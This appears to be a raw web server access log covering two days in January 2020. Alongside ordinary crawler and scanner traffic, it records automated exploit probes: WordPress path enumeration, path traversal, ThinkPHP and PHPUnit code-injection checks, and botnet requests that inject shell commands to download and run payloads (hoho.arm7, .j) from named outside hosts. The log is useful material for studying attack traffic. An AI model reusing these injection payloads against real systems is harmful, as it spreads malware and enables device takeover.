93.241.193.249 - - [21/Jan/2020:06:26:34 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
189.191.44.23 - - [21/Jan/2020:07:58:02 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
5.101.0.209 - - [21/Jan/2020:08:00:54 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:08:00:54 +0100] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:08:00:54 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:08:00:54 +0100] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:08:00:54 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
191.97.46.69 - - [21/Jan/2020:08:57:20 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:05:58 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:05:58 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:05:58 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:05:59 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:05:59 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:00 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:00 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:01 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:01 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:02 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:02 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:02 +0100] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:03 +0100] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:03 +0100] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:04 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:04 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:05 +0100] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:05 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:06 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:06 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:06 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
158.69.158.101 - - [21/Jan/2020:09:06:07 +0100] "" 400 0 "-" "-"
173.212.204.117 - - [21/Jan/2020:09:25:30 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:26:48 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:27:05 +0100] "GET /wordpress/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:27:19 +0100] "GET /wp/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:27:32 +0100] "GET /blog/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:27:44 +0100] "GET /new/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:28:00 +0100] "GET /old/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:28:15 +0100] "GET /backup/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:28:33 +0100] "GET /oldsite/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:28:57 +0100] "GET /back/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:29:02 +0100] "GET /2017/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
91.243.253.199 - - [21/Jan/2020:09:29:07 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:29:14 +0100] "GET /2018/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:29:17 +0100] "GET /div/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
47.90.207.111 - - [21/Jan/2020:09:29:20 +0100] "GET /temp/ HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
159.203.83.217 - - [21/Jan/2020:10:06:30 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
45.71.230.14 - - [21/Jan/2020:10:20:43 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.131.188.0 - - [21/Jan/2020:11:01:53 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
52.42.174.103 - - [21/Jan/2020:11:22:28 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
45.143.220.104 - - [21/Jan/2020:11:23:22 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
45.143.220.104 - - [21/Jan/2020:11:23:22 +0100] "GET /HNAP1/ HTTP/1.1" 404 136 "http://160.53.247.74/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.71.167.165 - - [21/Jan/2020:11:27:33 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
79.53.209.44 - - [21/Jan/2020:11:58:28 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
142.93.167.36 - - [21/Jan/2020:11:58:44 +0100] "\xE11u=\x9B\x09\x83\x12c{F)\x86esF\xD6.\x8C\x9E\x5C\xCBX G?\xC7)J\x08\xB5+^9\x16j" 400 166 "-" "-"
167.99.234.59 - - [21/Jan/2020:12:19:51 +0100] "GET /wp-login.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.172.49.111 - - [21/Jan/2020:12:58:30 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
74.63.227.26 - - [21/Jan/2020:13:33:12 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
5.101.0.209 - - [21/Jan/2020:13:40:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
69.254.205.35 - - [21/Jan/2020:13:43:49 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
178.238.174.67 - - [21/Jan/2020:15:13:47 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [21/Jan/2020:15:13:48 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [21/Jan/2020:15:13:49 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [21/Jan/2020:15:13:49 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [21/Jan/2020:15:13:49 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [21/Jan/2020:15:13:49 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
83.97.20.33 - - [21/Jan/2020:15:21:37 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
217.182.140.117 - - [21/Jan/2020:15:37:07 +0100] "GET /wp-login.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
121.138.83.147 - - [21/Jan/2020:15:42:27 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear.selfrep%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
121.138.83.147 - - [21/Jan/2020:15:42:28 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear.selfrep%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
121.138.83.147 - - [21/Jan/2020:15:42:30 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear.selfrep%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
121.138.83.147 - - [21/Jan/2020:15:42:34 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear.selfrep%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
121.138.83.147 - - [21/Jan/2020:15:42:42 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear.selfrep%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
185.153.199.246 - - [21/Jan/2020:16:18:59 +0100] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
185.153.199.246 - - [21/Jan/2020:16:19:00 +0100] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
178.128.94.31 - - [21/Jan/2020:16:43:53 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
5.206.20.223 - - [21/Jan/2020:17:14:07 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
74.63.227.26 - - [21/Jan/2020:17:18:59 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
18.207.210.247 - - [21/Jan/2020:17:26:20 +0100] "\x16\x03\x01\x01D\x01\x00\x01@\x03\x03@p\x5CQ\xDE*9\x08W\x9E\xBCP" 400 166 "-" "-"
54.36.150.127 - - [21/Jan/2020:17:44:58 +0100] "GET /185-gmail-gagne-en-nouveautes-sous-android HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
130.207.224.110 - - [21/Jan/2020:18:08:44 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 zgrab/0.x"
66.249.69.75 - - [21/Jan/2020:18:23:24 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.75 - - [21/Jan/2020:18:23:24 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.173.154.201 - - [21/Jan/2020:18:41:14 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
178.22.112.58 - - [21/Jan/2020:19:13:14 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:19:38:11 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:19:38:11 +0100] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:19:38:11 +0100] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:19:38:11 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [21/Jan/2020:19:38:12 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
139.162.144.113 - - [21/Jan/2020:20:39:00 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
5.101.0.209 - - [21/Jan/2020:21:08:49 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
172.104.137.154 - - [21/Jan/2020:21:32:32 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
5.189.176.208 - - [21/Jan/2020:21:53:13 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
174.138.7.207 - - [21/Jan/2020:22:00:29 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
217.27.147.255 - - [21/Jan/2020:22:22:25 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.243.172.112 - - [21/Jan/2020:22:25:05 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
78.26.80.32 - - [21/Jan/2020:22:50:44 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
88.50.89.118 - - [21/Jan/2020:23:34:06 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
62.173.154.201 - - [21/Jan/2020:23:59:32 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
51.68.152.26 - - [22/Jan/2020:00:01:57 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99"
89.42.112.183 - - [22/Jan/2020:00:33:37 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
213.14.137.105 - - [22/Jan/2020:01:00:23 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
216.245.210.54 - - [22/Jan/2020:01:06:27 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
159.65.11.106 - - [22/Jan/2020:01:14:16 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
41.78.212.50 - - [22/Jan/2020:01:37:01 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
54.36.148.166 - - [22/Jan/2020:01:53:13 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
36.79.219.39 - - [22/Jan/2020:02:13:48 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
186.233.178.54 - - [22/Jan/2020:03:18:22 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
54.36.148.181 - - [22/Jan/2020:03:37:05 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.150.60 - - [22/Jan/2020:03:37:06 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
165.255.184.112 - - [22/Jan/2020:03:38:09 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
165.227.62.246 - - [22/Jan/2020:03:46:00 +0100] "HEAD / HTTP/1.1" 200 0 "-" "-"
165.227.62.246 - - [22/Jan/2020:03:46:00 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
165.227.62.246 - - [22/Jan/2020:03:46:00 +0100] "GET /HNAP1/ HTTP/1.1" 404 136 "http://160.53.247.74/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
139.162.106.181 - - [22/Jan/2020:04:20:34 +0100] "GET / HTTP/1.1" 200 41 "-" "HTTP Banner Detection (https://security.ipip.net)"
198.108.66.144 - - [22/Jan/2020:04:22:37 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
183.80.118.148 - - [22/Jan/2020:05:14:38 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
213.159.213.236 - - [22/Jan/2020:05:46:12 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
87.157.206.129 - - [22/Jan/2020:05:51:06 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
